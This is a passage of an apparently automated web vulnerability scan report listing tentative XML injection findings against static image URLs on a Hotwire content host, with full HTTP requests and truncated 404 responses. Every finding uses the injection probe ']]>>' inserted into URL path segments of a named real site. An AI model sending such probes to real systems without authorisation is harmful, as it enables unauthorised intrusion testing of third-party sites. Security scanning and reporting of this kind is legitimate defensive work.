Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535984
Date: Mon, 03 Oct 2011 01:02:24 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.169. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Top.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/imgReviewsBox_Top.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:28 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.170. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Top.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/imgReviewsBox_Top.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535980
Date: Mon, 03 Oct 2011 01:02:32 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.171. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Top.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/imgReviewsBox_Top.gif]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:34 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.172. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/tripAdvisorLogo.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/tripAdvisorLogo.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535999
Date: Mon, 03 Oct 2011 01:02:23 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.173. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/tripAdvisorLogo.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/tripAdvisorLogo.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535993
Date: Mon, 03 Oct 2011 01:02:25 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.174. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/tripAdvisorLogo.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/tripAdvisorLogo.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:30 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.175. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/tripAdvisorLogo.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/tripAdvisorLogo.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:32 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.176. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/tripAdvisorLogo.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/tripAdvisorLogo.gif]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:35 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.177. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535998
Date: Mon, 03 Oct 2011 01:02:11 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.178. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/tripadvisor-ratings/tripAdvisorRating.png?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:16 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.179. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/tripadvisor-ratings/tripAdvisorRating.png?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:19 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.180. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/tripadvisor-ratings/tripAdvisorRating.png?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:21 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.181. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/tripadvisor-ratings]]>>/tripAdvisorRating.png?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:24 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.182. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 6]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png]]>>?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:29 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.183. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/map-console/icons/airport-icon.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/map-console/icons/airport-icon.gif?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:33 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.184. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/map-console/icons/airport-icon.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/map-console/icons/airport-icon.gif?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535999
Date: Mon, 03 Oct 2011 01:02:37 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.185. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/map-console/icons/airport-icon.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/map-console]]>>/icons/airport-icon.gif?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
